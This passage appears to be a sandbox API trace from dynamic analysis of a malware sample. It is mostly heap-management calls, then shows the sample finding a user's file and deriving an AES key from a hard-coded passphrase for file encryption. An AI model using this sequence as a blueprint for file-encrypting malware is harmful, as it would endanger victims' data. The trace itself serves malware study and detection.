lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.487] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.487] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.487] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0105.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0105.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0105.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0105.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca880, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0105.490] CloseHandle (hObject=0x298) returned 1 [0105.490] FreeLibrary (hLibModule=0x772d0000) returned 1 [0105.490] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0105.490] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc3fe2b0, ftCreationTime.dwHighDateTime=0x1d5e32d, ftLastAccessTime.dwLowDateTime=0xc02adcb0, ftLastAccessTime.dwHighDateTime=0x1d5ef34, ftLastWriteTime.dwLowDateTime=0xc02adcb0, ftLastWriteTime.dwHighDateTime=0x1d5ef34, nFileSizeHigh=0x0, nFileSizeLow=0x10d75, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Hf dn4y4LLHbc.swf", cAlternateFileName="HFDN4Y~1.SWF")) returned 0x41ac780 [0105.490] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0105.490] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.490] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0105.491] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0105.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0105.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0105.491] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a5250) returned 1 [0105.541] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0105.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.588] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0105.588] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.589] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cae98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0105.589] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0105.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0105.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0105.589] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0105.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0105.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0105.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0105.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb078, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0105.589] CryptHashData (hHash=0x41ac000, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0105.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.589] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0105.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb000, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0105.590] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac000, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac040) returned 1 [0105.590] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0105.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0105.590] CryptDestroyHash (hHash=0x41ac000) returned 1 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0105.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0105.591] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0105.591] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0105.591] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0105.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0105.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.591] 